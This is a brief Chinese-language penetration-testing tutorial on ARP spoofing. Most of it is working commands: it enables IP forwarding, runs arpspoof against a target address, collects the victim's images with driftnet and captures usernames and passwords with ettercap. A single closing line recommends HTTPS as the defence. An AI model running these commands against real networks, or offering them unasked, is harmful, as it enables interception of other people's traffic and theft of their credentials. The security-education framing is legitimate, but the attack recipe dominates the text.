关于渗透测试 arpspoof 欺骗抓包

首先开启测试终端转发功能，如未开启将会断网1为开启，0为关闭转发功能。

echo 1 > /proc/sys/net/ipv4/ip_forward

执行arpspoof命令

sudo arpspoof -t 192.168.50.138 192.168.50.156 -i eth0  //138为渗透对象，156为测试终端，i为指定网卡

获取渗透对象图片 sudo driftnet -i eth0 -d /home/kali/pic/ //i为指定网卡名称，-d为获取到图片保存地址 获取账号密码 sudo ettercap -Tq -i eth0 //开启后显示获取username与password的字段数据包 关于防范该问题的方法：上SSL证书，开启https即可解决。所以在http协议下切勿输入你重要的密码。